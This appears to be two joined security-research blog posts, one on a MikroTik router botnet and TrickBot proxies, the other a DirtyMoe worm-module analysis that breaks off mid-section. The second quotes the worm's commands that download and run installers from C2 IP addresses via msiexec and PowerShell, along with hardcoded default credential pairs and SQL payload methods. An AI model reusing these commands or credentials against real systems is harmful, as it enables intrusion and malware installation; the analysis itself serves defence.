Naturally, an email from our partners, sent on July 8, 2021, regarding a TrickBot campaign landed in my inbox. They informed us that they found a couple of new C2 servers that seemed to be hosted on IoT devices, specifically MikroTik routers, sending us the IPs. This immediately caught my attention.
MikroTik routers are pretty robust but run on a proprietary OS, so it seemed unlikely that the routers were hosting the C2 binary directly. The only logical conclusion I could come to was that the servers were using enslaved MikroTik devices to proxy traffic to the next tier of C2 servers to hide them from malware hunters.
I instantly had deja-vu, and thought “They are misusing that vulnerability aga…”.
Opening Pandora’s box full of dark magic and evil
Knowing all this, I decided to experiment by deploying a honeypot, more precisely a vulnerable version of a MikroTik cloud router exposed to the internet. I captured all the traffic and logged everything from the virtual device. Initially, I thought, let’s give it a week to see what’s going on in the wild.
In the past, we were only dealing with already compromised devices seeing the state they had been left in, after the fact. I was hoping to observe the initial compromise as it happened in real-time.
Exactly15 minutesafter deploying the honeypot, and it’s important to note that I intentionally changed the admin username and password to a really strong combination before activating it, I saw someone logging in to the router using the infamous CVE described above (which was later confirmed by PCAP analysis).
We’ve often seen fetch scripts from various domains hidden behind Cloudflare proxies used against compromised routers.
But either by mistake, or maybe intentionally, the first fetch that happened after the attacker got inside went to:
bestony.club at that time was not hidden behind Cloudflare and resolved directly to an IP address (116.202.93.14), a VPS hosted by Hetzner in Germany. This first fetch served a script that tried to fetch additional scripts from the other domains.
What is the intention of this script you ask? Well, as you can see, it tries to overwrite and rename all existing scheduled scripts named U3, U4..U7 and set scheduled tasks to repeatedly import script fetched from the particular address, replacing the first stage “bestony.info” with “globalmoby.xyz”. In this case, the domain is already hidden behind CloudFlare to minimize likeness to reveal the real IP address if the C2 server is spotted.
The second stage of the script, pulled from the C2, is more concrete and meaningful:
It hardens the router by closing all management interfaces leaving only SSH, and WinBox (the initial attack vector) open and enables the SOCKS4 proxy server on port 5678.
Interestingly, all of the URLs had the same format:
http://[domainname]/poll/[GUID]
The logical assumption for this would be that the same system is serving them, if bestony.club points to a real IP, while globalmoby.xyz is hidden behind a proxy, Cloudflare probably hides the same IP. So, I did a quick test by issuing:
And it worked! Notice two things here; it’s necessary to put a --user-agent header to imitate the router; otherwise, it won’t work. I found out that the GUID doesn’t matter when issuing the request for the first time, the router is probably registered in the database, so anything that fits the GUID format will work. The second observation was that every GUID works only once or has some rate limitation. Testing the endpoint, I also found that there is a bug or a “silent error” when the end of the URL doesn’t conform to the GUID, for example:
It works too, and it works consistently, not just once. It seems when inserting the URL into the database, an error/exception is thrown, but because it is silently ignored, nothing is written into the database, but still the script is returned (which is quite interesting, that would mean the scripts are not exactly tied to the ID of the victim).
Listing used domains
The bestony.club is the first stage, and it gets us the second stage script and Cloudflare hidden domain. You can see the GUID is reused throughout the stages. Provided all that we’ve learned, I tried to query the
It worked several times, and as a bonus, it was returning different domains now and then. So by creating a simple script, we “generated” a list of domains being actively used.
domain
IP
ISP
bestony.club
116.202.93.14
Hetzner, DE
massgames.space
multiple
Cloudflare
widechanges.best
multiple
Cloudflare
weirdgames.info
multiple
Cloudflare
globalmoby.xyz
multiple
Cloudflare
specialword.xyz
multiple
Cloudflare
portgame.website
multiple
Cloudflare
strtz.site
multiple
Cloudflare
The evil spreads its wings
Having all these domains, I decided to pursue the next step to check whether all the hidden domains behind Cloudflare are actually hosted on the same server. I was closer to thinking that the central C&C server was hosted there too. Using the same trick, querying the IP directly with the host header, led to the already expected conclusion:
Yes, all the domains worked against the IP, moreover, if you try to query a GUID, particularly using the host headers trick:
It won’t work again using the full URL and vice versa.
Which returns an error as the GUID has been already registered by the first query, proving that we are accessing the same server and data.
Obviously, we found more than we asked for, but that was not the end.
A short history of CVE-2018-14847
It all probably started back in 2018, more precisely on April 23, when Latvian hardware company MikroTik publicly announced that they fixed and released an update for their very famous and widely used routers, patching the CVE-2018-14847 vulnerability. This vulnerability allowed anyone to literally download the user database and easily decode passwords from the device remotely by just using a few packets through the exposed administrative protocol TCP port 8291. The bar was low enough for anyone to exploit it, and no force could have pushed users to update the firmware. So the outcome was as expected: Cybercriminals had started to exploit it.
The root cause
Tons of articles and analysis of this vulnerability have been published. The original explanation behind it was focused more on how the WinBox protocol works and that you can ask a file from the router if it’s not considered as sensitive in pre-auth state of communication. Unfortunately, in the reading code path there is also a path traversal vulnerability that allows an attacker to access any file, even if it is considered as sensitive. The great and detailed explanation is in this post from Tenable. The researchers also found that this path traversal vulnerability is shared among other “API functions” handlers, so it’s also possible to write an arbitrary file to the router using the same trick, which greatly enlarges the attack surface.
Messy situation
Since then, we’ve been seeing plenty of different strains misusing the vulnerability. The first noticeable one was crypto mining malware cleverly setting up the router using standard functions and built-in proxy to inject crypto mining JavaScript into every HTTP request being made by users behind the router, amplifying the financial gain greatly. More in our Avast blog post from 2018.
Since then, the vulnerable routers resembled a war field, where various attackers were fighting for the device, overwriting each other’s scripts with their own. One such noticeable strain was Glupteba misusing the router and installing scheduled scripts that repeatedly reached out for commands from C2 servers to establish a SOCKS proxy on the device that allowed it to anonymize other malicious traffic.
Now, we see another active campaign is being hosted on the same servers, so is there any remote possibility that these campaigns are somehow connected?
Closing the loop
As mentioned before, all the leads led to this one particular IP address (which doesn’t work anymore)
116.202.93.14
It was more than evident that this IP is a C2 server used for an ongoing campaign, so let’s find out more about it, to see if we can find any ties or indication that it is connected to the other campaigns.
It turned out that this particular IP has been already seen and resolved to various domains. Using the RISKIQ service, we also found one eminent domain tik.anyget.ru. When following the leads and when digging deeper and trying to find malicious samples that access the particular host, we bumped into this interesting sample:
The sample was accessing the following URL, directly http://tik.anyget.ru/api/manager from there it downloaded a JSON file with a list of IP addresses. This sample is ARM32 SOCKS proxy server binary written in Go and linked to the Glupteba malware campaign. The first recorded submission in VirusTotal was from November 2020, which fits with the Glupteba outbreak.
It seems that the Glupteba malware campaign used the same server.
When requesting the URL http://tik.anyget.ru I was redirected to the http://routers.rip/site/login domain (which is again hidden by the Cloudflare proxy) however, what we got will blow your mind:
This is a control panel for the orchestration of enslaved MikroTik routers. As you can see, the number at the top displays the actual number of devices, close to 230K of devices, connected into the botnet. To be sure, we are still looking at the same host we tried:
And it worked. Encouraged by this, I also tried several other IoCs from previous campaigns:
From the crypto mining campaign back in 2018:
To the Glupteba sample:
All of them worked. Either all of these campaigns are one, or we are witnessing a botnet-as-a-service. From what I’ve seen, I think the second is more likely. When browsing through the control panel, I found one section that had not been password protected, a presets page in the control panel:
The oddity here is that the page automatically switches into Russian even though the rest stays in English (intention, mistake?). What we see here are configuration templates for MikroTik devices. One in particular tied the loop of connecting the pieces together even more tightly. The VPN configuration template
This confirms our suspicion, because these exact configurations can be found on all of our honeypots and affected routers:
Having all these indications and IoCscollected, I knew I was dealing with a trove of secrets and historical data since the beginning of the outbreak of the MikroTik campaign. I also ran an IPV4 thorough scan for socks port 5678, which was a strong indicator of the campaign at that time, and I came up with almost 400K devices with this port opened. The socks port was opened on my honeypot, and as soon as it got infected, all the available bandwidth of 1Mbps was depleted in an instant. At that point, I thought this could be the enormous power needed for DDoS attacks, and then two days later…
Mēris
On September 7, 2021, QRator Labs published a blog post about a new botnet called Mēris. Mēris is a botnet of considerable scale misusing MikroTik devices to carry out one of the most significant DDoS attacks against Yandex, the biggest search engine in Russia, as well as attacks against companies in Russia, New Zealand, and the United States. It had all the features I’ve described in my investigation.
The day after the publication appeared, the C2 server stopped serving scripts, and the next day, it disappeared completely. I don’t know if it was a part of a legal enforcement action or just pure coincidence that the attackers decided to bail out on the operation in light of the public attention on Mēris. The same day my honeypots restored the configuration by closing the SOCKS proxies.
TrickBot
As the IP addresses mentioned at the very beginning of this post sparked our wild investigation, we owe TrickBot a section in this post. The question, which likely comes to mind now is: “Is TrickBot yet another campaign using the same botnet-as-a-service?”. We can’t tell for sure. However, what we can share is what we found on devices. The way TrickBot proxies the traffic using the NAT functionality in MikroTik usually looks like this:
Part of IoC fingerprint is that usually, the same rule is there multiple times, as the infection script doesn’t check if it is already there:
Although in the case of TrickBot we are not entirely sure if this could be taken as proof, I found some shared IoCs, such as
Scheduled scripts / SOCKS proxies enabled as in previous case
Common password being set on most of the TrickBot MikroTik C2 proxies
It’s, however, not clear if this is a pure coincidence and a result of the router being infected more than once, or if the same C2 was used. From the collected NAT translation, I’ve been able to identify a few IP addresses of the next tier of TrickBot C2 servers (see IoCs section).
Not only MikroTik used by TrickBot
When investigating the TrickBot case I saw (especially after the Mēris case was published) a slight shift over time towards other IoT devices, other than MikroTik. Using the SSH port fingerprinting I came across several devices with an SSL certificate leading to LigoWave devices. Again, the modus operandi seems to be the same, the initial vector of infection seems to be default credentials, then using capabilities of the device to proxy the traffic from the public IP address to TrickBot “hidden” C2 IP address.
To find the default password it took 0.35 sec on Google
The same password can be used to login into the device using SSH as admin with full privileges and then it’s a matter of using iptables to set up the same NAT translation as we saw in the MikroTik case
They know the devices
During my research, what struck me was how the criminals paid attention to details and subtle nuances. For example, we found one configuration on this device:
Knowing this device type, the attacker has disabled a physical display that loops through the stats of all the interfaces, purposefully to hide the fact that there is a malicious VPN running.
Remediation
The main and most important step to take is to update your router to the latest version and remove the administrative interface from the public-facing interface, you can follow our recommendation from our 2018 blog post which is still valid. In regards to TrickBot campaign, there are few more things you can do:
check all dst-nat mappings in your router, from SSH or TELNET terminal you can simply type: /ip firewall nat print and look for the nat rules that are following the aforementioned rules or are suspicious, especially if the dst-address and to-address are both public IP addresses.
check the usernames/user printif you see any unusual username or any of the usernames from our IoCs delete them
If you can’t access your router on usual ports, you can check one of the alternative ones in our IoCs as attackers used to change them to prevent others from taking back ownership of the device.
Check the last paragraph of this blog post for more details on how to setup your router in a safe manner
Conclusion
Since 2018, vulnerable MikroTik routers have been misused for several campaigns. I believe, and as some of the IoCs and my research prove, that a botnet offered for service has been in operation since then.
It also shows, what is quite obvious for some time already (see our Q3 2021 report), that IoT devices are being heavily targeted not just to run malware on them, which is hard to write and spread massively considering all the different architectures and OS versions, but to simply use their legal and built-in capabilities to set them up as proxies. This is done to either anonymize the attacker’s traces or to serve as a DDoS amplification tool. What we see here is just the tip of the iceberg and it is vital to note that properly and securely setting up devices and keeping them up-to-date is crucial to avoid becoming an easy target and helping facilitate criminal activity.
Just recently, new information popped up showing that the REvil ransomware gang is using MikroTik devices for DDoS attacks. The researchers from Imperva mention in their post that the Mēris botnet is likely being used to carry out the attack, however, as far as we know the Mēris botnet was dismantled by Russian law enforcement. This a new re-incarnation or the well-known vulnerabilities in MikroTik routers are being exploited again. I can’t tell right now, but what I can tell is that patch adoption and generally, security of IoT devices and routers, in particular, is not good. It’s important to understand that updating devices is not just the sole responsibility of router vendors, but we are all responsible. To make this world more secure, we need to all come together to jointly make sure routers are secure, so please, take a few minutes now to update your routers set up a strong password, disable the administration interface from the public side, and help all the others who are not that technically savvy to do so.
The DirtyMoe malware is deployed using various kits like PurpleFox or injected installers of Telegram Messenger that require user interaction. Complementary to this deployment, one of the DirtyMoe modules expands the malware using worm-like techniques that require no user interaction.
This research analyzes this worming module’s kill chain and the procedures used to launch/control the module through the DirtyMoe service. Other areas investigated include evaluating the risk of identified exploits used by the worm and detailed analysis of how its victim selection algorithm works. Finally, we examine this performance and provide a thorough examination of the entire worming workflow.
The analysis showed that the worming module targets older well-known vulnerabilities, e.g., EternalBlue and Hot Potato Windows Privilege Escalation. Another important discovery is a dictionary attack using Service Control Manager Remote Protocol (SCMR), WMI, and MS SQL services. Finally, an equally critical outcome is discovering the algorithm that generates victim target IP addresses based on the worming module’s geographical location.
One worm module can generate and attack hundreds of thousands of private and public IP addresses per day; many victims are at risk since many machines still use unpatched systems or weak passwords. Furthermore, the DirtyMoe malware uses a modular design; consequently, we expect other worming modules to be added to target prevalent vulnerabilities.
1. Introduction
DirtyMoe, the successful malware we documented in detail in the previous series, also implements mechanisms to reproduce itself. The most common way of deploying the DirtyMoe malware is via phishing campaigns or malvertising. In this series, we will focus on techniques that help DirtyMoe to spread in the wild.
The PurpleFox exploit kit (EK) is the most frequently observed approach to deploy DirtyMoe; the immediate focus of PurpleFox EK is to exploit a victim machine and install DirtyMoe. PurpleFox EK primarily abuses vulnerabilities in the Internet Explorer browser via phishing emails or popunder ads. For example, Guardicore described a worm spread by PurpleFox that abuses SMB services with weak passwords [2], infiltrating poorly secured systems. Recently, Minerva Labs has described the new infection vector installing DirtyMoe via an injected Telegram Installer [1].
Currently, we are monitoring three approaches used to spread DirtyMoe in the wild; Figure 1 illustrates the relationship between the individual concepts. The primary function of the DirtyMoe malware is crypto-mining; it is deployed to victims’ machines using different techniques. We have observed PurpleFox EK, PurleFox Worm, and injected Telegram Installers as mediums to spread and install DirtyMoe; we consider it highly likely that other mechanisms are used in the wild.
In the fourth series on this malware family, we described the deployment of the DirtyMoe service. Figure 2 illustrates the DirtyMoe hierarchy. The DirtyMoe service is run as a svchost process that starts two other processes: DirtyMoe Core and Executioner, which manages DirtyMoe modules. Typically, the executioner loads two modules; one for Monero mining and the other for worming replication.
Our research has been focused on worming since it seems that worming is one of the main mediums to spread the DirtyMoe malware. The PurpleFox worm described by Guardicore [2] is just the tip of the worming iceberg because DirtyMoe utilizes sophisticated algorithms and methods to spread itself into the wild and even to spread laterally in the local network.
The goal of the DirtyMoe worm is to exploit a target system and install itself into a victim machine. The DirtyMoe worm abuses several known vulnerabilities as follow:
MS15-076: RCE Allow Elevation of Privilege (Hot Potato Windows Privilege Escalation)
Dictionary attacks to MS SQL Servers, SMB, and Windows Management Instrumentation (WMI)
The prevalence of DirtyMoe is increasing in all corners of the world; this may be due to the DirtyMoe worm’s strategy of generating targets using a pseudo-random IP generator that considers the worm’s geological and local location. A consequence of this technique is that the worm is more flexible and effective given its location. In addition, DirtyMoe can be expanded to machines hidden behind NAT as this strategy also provides lateral movement in local networks. A single DirtyMoe instance can generate and attack up to 6,000 IP addresses per second.
The insidiousness of the whole worm’s design is its modularization controlled by C&C servers. For example, DirtyMoe has a few worming modules targeting a specific vulnerability, and C&C determines which worming module will be applied based on information sent by a DirtyMoe instance.
The DirtyMoe worming module implements three basic phases common to all types of vulnerabilities. First, the module generates a list of IP addresses to target in the initial phase. Then, the second phase attacks specific vulnerabilities against these targets. Finally, the module performs dictionary attacks against live machines represented by the randomly generated IP addresses. The most common modules that we have observed are SMB and SQL.
This article focuses on the DirtyMoe worming module. We analyze and discuss the worming strategy, which exploits are abused by the malware author, and a module behavior according to geological locations. One of the main topics is the performance of IP address generation, which is crucial for the malware’s success. We are also looking for specific implementations of abused exploits, including their origins.
2. Worm Kill Chain
We can describe the general workflow of the DirtyMoe worming module through the kill chain. Figure 3 illustrates stages of the worming workflow.
Reconnaissance The worming module generates targets at random but also considers the geolocation of the module. Each generated target is tested for the presence of vulnerable service versions; the module connects to the specific port where attackers expect vulnerable services and verifies whether the victim’s machine is live. If the verification is successful, the worming module collects basic information about the victim’s OS and versions of targeted services.
Weaponization The C&C server appears to determine which specific module is used for worming without using any victim’s information. Currently, we do not precisely know what algorithm is used for module choice but suspect it depends on additional information sent to the C&C server.
When the module verifies that a targeted victim’s machine is potentially exploitable, an appropriate payload is prepared, and an attack is started. The payload must be modified for each attack since a remote code execution (RCE) command is valid only for a few minutes.
Delivery In this kill chain phase, the worming module sends the prepared payload. The payload delivery is typically performed using protocols of targeted services, e.g., SMB or MS SQL protocols.
Exploitation and Installation If the payload is correct and the victim’s machine is successfully exploited, the RCE command included in the payload is run. Consequently, the DirtyMoe malware is deployed, as was detailed in the previous article (DirtyMoe: Deployment).
3. RCE Command
The main goal of the worming module is to achieve RCE under administrator privileges and install a new DirtyMoe instance. The general form of the executed command (@RCE@) is the same for each worming module: Cmd /c for /d %i in (@WEB@) do Msiexec /i http://%i/@FIN@ /Q
The command usually iterates through three IP addresses of C&C servers, including ports. IPs are represented by the placeholder @WEB@ filled on runtime. Practically, @WEB@ is regenerated for each payload sent since the IPs are rotated every minute utilizing sophisticated algorithms; this was described in Section 2 of the first blog.
The second placeholder is @FIN@ representing the DirtyMoe object’s name; this is, in fact, an MSI installer package. The package filename is in the form of a hash – [A-F0-9]{8}\.moe. The hash name is generated using a hardcoded hash table, methods for rotations and substrings, and by the MS_RPC_<n> string, where n is a number determined by the DirtyMoe service.
The core of the @RCE@ command is the execution of the remote DirtyMoe object (http://) via msiexec in silent mode (/Q). An example of a specific @RCE@ command is: Cmd /c for /d %i in (45.32.127.170:16148 92.118.151.102:19818 207.246.118.120:11410) do Msiexec /i http://%i/6067C695.moe /Q
4. IP Address Generation
The key feature of the worming module is the generation of IP addresses (IPs) to attack. There are six methods used to generate IPs with the help of a pseudo-random generator; each method focuses on a different IPv4 Class. Accordingly, this factor contributes to the globally uniform distribution of attacked machines and enables the generation of more usable IP addresses to target.
4.1 Class B from IP Table
The most significant proportion of generated addresses is provided by 10 threads generating IPs using a hardcoded list of 24,622 items. Each list item is in form 0xXXXX0000, representing IPs of Class B. Each thread generates IPs based on the algorithms as follows:
The algorithm randomly selects a Class B address from the list and 65,536 times generates an entirely random number that adds to the selected Class B addresses. The effect is that the final IP address generated is based on the geological location hardcoded in the list.
Figure 4 shows the geological distribution of hardcoded addresses. The continent distribution is separated into four parts: Asia, North America, Europe, and others (South America, Africa, Oceania). We verified this approach and generated 1M addresses using the algorithm. The result has a similar continental distribution. Hence, the implementation ensures that the IP addresses distribution is uniform.
4.2 Fully Random IP
The other three threads generate completely random IPs, so the geological position is also entirely random. However, the full random IP algorithm generates low classes more frequently, as shown in the algorithm below.
4.3 Derived Classes A, B, C
Three other algorithms generate IPs based on an IP address of a machine (IPm) where the worming module runs. Consequently, the worming module targets machines in the nearby surroundings.
Addresses are derived from the IPm masked to the appropriate Class A/B/C, and a random number representing the lower Class is added; as shown in the following pseudo-code.
4.4 Derived Local IPs
The last IP generating method is represented by one thread that scans interfaces attached to local networks. The worming module lists local IPs using gethostbyname() and processes one local address every two hours.
Each local IP is masked to Class C, and 255 new local addresses are generated based on the masked address. As a result, the worming module attacks all local machines close to the infected machine in the local network.
5. Attacks to Abused Vulnerabilities
We have detected two worming modules which primarily attack SMB services and MS SQL databases. Our team has been lucky since we also discovered something rare: a worming module containing exploits targeting PHP, Java Deserialization, and Oracle Weblogic Server that was still under development. In addition, the worming modules include a packed dictionary of 100,000-words used with dictionary attacks.
5.1 EternalBlue
One of the main vulnerabilities is CVE:2017-0144: EternalBlue SMB Remote Code Execution (patched by Microsoft in MS17-010). It is still bewildering how many EternalBlue attacks are still observed – Avast is still blocking approximately 20 million attempts for the EternalBlue attack every month.
The worming module focuses on the Windows version from Windows XP to Windows 8. We have identified that the EternalBlue implementation is the same as described in exploit-db [3], and an effective payload including the @RCE@ command is identical to DoublePulsar [4]. Interestingly, the whole EternalBlue payload is hardcoded for each Windows architecture, although the payload can be composed for each platform separately.
5.2 Service Control Manager Remote Protocol
No known vulnerability is used in the case of Service Control Manager Remote Protocol (SCMR) [5]. The worming module attacks SCMR through a dictionary attack. The first phase is to guess an administrator password. The details of the dictionary attack are described in Section 6.4.
If the dictionary attack is successful and the module guesses the password, a new Windows service is created and started remotely via RPC over the SMB service. Figure 5 illustrates the network communication of the attack. Binding to the SCMR is identified using UUID {367ABB81-9844-35F1-AD32- 98F038001003}. On the server-side, the worming module as a client writes commands to the \PIPE\svcctl pipe. The first batch of commands creates a new service and registers a command with the malicious @RCE@ payload. The new service is started and is then deleted to attempt to cover its tracks.
The Microsoft HTML Application Host (mshta.exe) is used as a LOLbin to execute and create ShellWindows and run @RCE@. The advantage of this proxy execution is that mshta.exe is typically marked as trusted; some defenders may not detect this misuse of mshta.exe.
Windows Event records these suspicious events in the System log, as shown in Figure 6. The service name is in the form AC<number>, and the number is incremented for each successful attack. It is also worth noting that ImagePath contains the @RCE@ command sent to SCMR in BinaryPathName, see Figure 5.
5.3 Windows Management Instrumentation
The second method that does not misuse any known vulnerability is a dictionary attack to Windows Management Instrumentation (WMI). The workflow is similar to the SCMR attack. Firstly, the worming module must also guess the password of a victim administrator account. The details of the dictionary attack are described in Section 6.4.
The attackers can use WMI to manage and access data and resources on remote computers [6]. If they have an account with administrator privileges, full access to all system resources is available remotely.
The malicious misuse lies in the creation of a new process that runs @RCE@ via a WMI script; see Figure 7. DirtyMoe is then installed in the following six steps:
Initialize the COM library.
Connect to the default namespace root/cimv2 containing the WMI classes for management.
The Win32_Process class is created, and @RCE@ is set up as a command-line argument.
Win32_ProcessStartup represents the startup configuration of the new process. The worming module sets a process window to a hidden state, so the execution is complete silently.
The new process is started, and the DirtyMoe installer is run.
Finally, the WMI script is finished, and the COM library is cleaned up.
5.4 Microsoft SQL Server
Attacks on Microsoft SQL Servers are the second most widespread attack in terms of worming modules. Targeted MS SQL Servers are 2000, 2005, 2008, 2012, 2014, 2016, 2017, 2019.
The worming module also does not abuse any vulnerability related to MS SQL. However, it uses a combination of the dictionary attack and MS15-076: “RCE Allow Elevation of Privilege” known as “Hot Potato Windows Privilege Escalation”. Additionally, the malware authors utilize the MS15-076 implementation known as Tater, the PowerSploit function Invoke-ReflectivePEInjection, and CVE-2019-1458: “WizardOpium Local Privilege Escalation” exploit.
The first stage of the MS SQL attack is to guess the password of an attacked MS SQL server. The first batch of username/password pairs is hardcoded. The malware authors have collected the hardcoded credentials from publicly available sources. It contains fifteen default passwords for a few databases and systems like Nette Database, Oracle, Firebird, Kingdee KIS, etc. The complete hardcoded credentials are as follows: 401hk/401hk_@_, admin/admin, bizbox/bizbox, bwsa/bw99588399, hbv7/zXJl@mwZ, kisadmin/ypbwkfyjhyhgzj, neterp/neterp, ps/740316, root/root, sp/sp, su/t00r_@_, sysdba/masterkey, uep/U_tywg_2008, unierp/unierp, vice/vice.
If the first batch is not successful, the worming module attacks using the hardcoded dictionary. The detailed workflow of the dictionary attack is described in Section 6.4.
If the module successfully guesses the username/password of the attacked MS SQL server, the module executes corresponding payloads based on the Transact-SQL procedures. There are five methods launched one after another.
sp_start_job The module creates, schedules, and immediately runs a task with Payload 1.
sp_makewebtask The module creates a task that produces an HTML document containing Payload 2.
sp_OAMethod The module creates an OLE object using the VBScript “WScript.Shell“ and runs Payload 3.
xp_cmdshell This method spawns a Windows command shell and passes in a string for execution represented by Payload 3.
Run-time Environment Payload 4 is executed as a .NET assembly.
In brief, there are four payloads used for the DirtyMoe installation. The SQL worming module defines a placeholder @SQLEXEC@ representing a full URL to the MSI installation package located in the C&C server. If any of the payloads successfully performed a privilege escalation, the DirtyMoe installation is silently launched via MSI installer; see our DirtyMoe Deployment blog post for more details.
Payload 1
The first payload tries to run the following PowerShell command: powershell -nop -exec bypass -c "IEX $decoded; MsiMake @SQLEXEC@;" where $decoded contains the MsiMake functions, as is illustrated in Figure 8. The function calls MsiInstallProduct function from msi.dll as a completely silent installation (INSTALLUILEVEL_NONE) but only if the MS SQL server runs under administrator privileges.
Payload 2
The second payload is used only for sp_makewebtask execution; the payload is written to the following autostart folders: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.hta C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\1.hta
Figure 9 illustrates the content of the 1.hta file camouflaged as an HTML file. It is evident that DirtyMoe may be installed on each Windows startup.
Payload 3
The last payload is more sophisticated since it targets the vulnerabilities and exploits mentioned above. Firstly, the worming module prepares a @SQLPSHELL@ placeholder containing a full URL to the DirtyMoe object that is the adapted version of the Tater PowerShell script.
The first stage of the payload is a powershell command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''@SQLPSHELL@''); MsiMake @SQLEXEC@"
The adapted Tater script implements the extended MsiMake function. The script attempts to install DirtyMoe using three different ways:
Install DirtyMoe via the MsiMake implementation captured in Figure 8.
Attempt to exploit the system using Invoke-ReflectivePEInjection with the following arguments: Invoke-ReflectivePEInjection -PEBytes $Bytes -ExeArgs $@RCE@ -ForceASLR where $Bytes is the implementation of CVE-2019-1458 that is included in the script.
The last way is installation via the Tater command: Invoke-Tater -Command $@RCE@
The example of Payload 3 is: powershell -nop -exec bypass -c "IEX (New-ObjectNet. WebClient).DownloadString( 'http://108.61.184.105:20114/57BC9B7E.Png'); MsiMake http://108.61.184.105:20114/0CFA042F.Png
Payload 4
The attackers use .NET to provide a run-time environment that executes an arbitrary command under the MS SQL environment. The worming module defines a new assembly .NET procedure using Common Language Runtime (CLR), as Figure 10 demonstrates.
The .NET code of Payload 4 is a simple class defining a SQL procedure ExecCommand that runs a malicious command using the Process class; shown in Figure 11.
5.5 Development Module
We have discovered one worming module containing artifacts that indicate that the module is in development. This module does not appear to be widespread in the wild, and it may give insight into the malware authors’ future intentions. The module contains many hard-coded sections in different states of development; some sections do not hint at the @RCE@ execution.
The module uses the exact implementation published at [7]; see Figure 12. In short, a CGI script that verifies the ability of call_user_func_array is sent. If the verification is passed, the CGI script is re-sent with @RCE@.
Deserialization
CVE:2018-0147: Deserialization Vulnerability
The current module implementation executes a malicious Java class [8], shown in Figure 13, on an attacked server. The RunCheckConfig class is an executioner for accepted connections that include a malicious serializable object.
The module prepares the serializable object illustrated in Figure 14 that the RunCheckConfig class runs when the server accepts this object through the HTTP POST method.
The implementation that delivers the RunCheckConfig class into the attacked server abused the same vulnerability. It prepares a serializable object executing ObjectOutputStream, which writes the RunCheckConfig class into c:/windows/tmp. However, this implementation is not included in this module, so we assume that this module is still in development.
Oracle Weblogic Server
CVE:2019-2725: Oracle Weblogic Server - 'AsyncResponseService' Deserialization RCE
The module again exploits vulnerabilities published at [9] to send malicious SOAP payloads without any authentication to the Oracle Weblogic Server T3 interface, followed by sending additional SOAP payloads to the WLS AsyncResponseService interface.
SOAP The SOAP request defines the WorkContext as java.lang.Runtime with three arguments. The first argument defines which executable should be run. The following arguments determine parameters for the executable. An example of the WorkContext is shown in Figure 15.
Hardcoded SOAP commands are not related to @RCE@; we assume that this implementation is also in development.
6. Worming Module Execution
The worming module is managed by the DirtyMoe service, which controls its configuration, initialization, and worming execution. This section describes the lifecycle of the worming module.
6.1 Configuration
The DirtyMoe service contacts one of the C&C servers and downloads an appropriate worming module into a Shim Database (SDB) file located at %windir%\apppatch\TK<volume-id>MS.sdb. The worming module is then decrypted and injected into a new svchost.exe process, as Figure 2 illustrates.
The encrypted module is a PE executable that contains additional placeholders. The DirtyMoe service passes configuration parameters to the module via these placeholders. This approach is identical to other DirtyMoe modules; however, some of the placeholders are not used in the case of the worming module.
The placeholders overview is as follows:
@TaskGuid@: N/A in worming module
@IPsSign@: N/A in worming module
@RunSign@: Mutex created by the worming module that is controlled by the DirtyMoe service
@GadSign@: ID of DirtyMoe instance registered in C&C
@FixSign@: Type of worming module, e.g, ScanSmbHs5
@InfSign@: Worming module configuration
6.2 Initialization
When the worming module, represented by the new process, is injected and resumed by the DirtyMoe service, the module initialization is invoked. Firstly, the module unpacks a word dictionary containing passwords for a dictionary attack. The dictionary consists of 100,000 commonly used passwords compressed using LZMA. Secondly, internal structures are established as follows:
IP Address Backlog The module stores discovered IP addresses with open ports of interest. It saves the IP address and the timestamp of the last port check.
Dayspan and Hourspan Lists These lists manage IP addresses and their insertion timestamps used for the dictionary attack. The IP addresses are picked up based on a threshold value defined in the configuration. The IP will be processed if the IP address timestamp surpasses the threshold value of the day or hour span. If, for example, the threshold is set to 1, then if a day/hour span of the current date and a timestamp is greater than 1, a corresponding IP will be processed. The Dayspan list registers IPs generated by Class B from IP Table, Fully Random IP, and Derived Classes A methods; in other words, IPs that are further away from the worming module location. On the other hand, the Hourspan list records IPs located closer.
Thirdly, the module reads its configuration described by the @InfSign@ placeholder. The configuration matches this pattern: <IP>|<PNG_ID>|<timeout>|[SMB:HX:PX1.X2.X3:AX:RX:BX:CX:DX:NX:SMB]
IP is the number representing the machine IP from which the attack will be carried out. The IP is input for the methods generating IPs; see Section 4. If the IP is not available, the default address 98.126.89.1 is used.
PNG_ID is the number used to derive the hash-name that mirrors the DirtyMoe object name (MSI installer package) stored at C&C. The hashname is generated using MS_RPC_<n> string where n is PNG_ID; see Section 3.
Timeout is the default timeout for connections to the attacked services in seconds.
HX is a threshold for comparing IP timestamps stored in the Dayspan and Hourspan lists. The comparison ascertains whether an IP address will be processed if the timestamp of the IP address exceeds the day/hour threshold.
P is the flag for the dictionary attack.
X1 number determines how many initial passwords will be used from the password dictionary to increase the probability of success – the dictionary contains the most used passwords at the beginning.
X2 number is used for the second stage of the dictionary attack if the first X1 passwords are unsuccessful. Then the worming module tries to select X2 passwords from the dictionary randomly.
X3 number defines how many threads will process the Dayspan and Hourspan lists; more precisely, how many threads will attack the registered IP addresses in the Dayspan/Hourspan lists.
AX: how many threads will generate IP addresses using Class B from IP Table methods.
The typical configuration can be 217.xxx.xxx.xxx|5|2|[SMB:H1:P1.30.3:A10:R3:B3:C3:D1:N3:SMB]
Finally, the worming module starts all threads defined by the configuration, and the worming process and attacks are started.
6.3 Worming
The worming process has five phases run, more or less, in parallel. Figure 16 has an animation of the worming process.
Phase 1
The worming module usually starts 23 threads generating IP addresses based on Section 4. The IP addresses are classified into two groups: day-span and hour-span.
Phase 2
The second phase runs in parallel with the first; its goal is to test generated IPs. Each specific module targets defined ports that are verified via sending a zero-length transport datagram. If the port is active and ready to receive data, the IP address of the active port is added to IP Address Backlog. Additionally, the SMB worming module immediately tries the EternalBlue attack within the port scan.
Phase 3
The IP addresses verified in Phase 2 are also registered into the Dayspan and Hourspan lists. The module keeps only 100 items (IP addresses), and the lists are implemented as a queue. Therefore, some IPs can be removed from these lists if the IP address generation is too fast or the dictionary attacks are too slow. However, the removed addresses are still present in the IP Address Backlog.
Phase 4
The threads created based on the X3 configuration parameters process and manage the items (IPs) of Dayspan and Hourspan lists. Each thread picks up an item from the corresponding list, and if the defined day/hour threshold (HX parameter) is exceeded, the module starts the dictionary attack to the picked-up IP address.
Phase 5
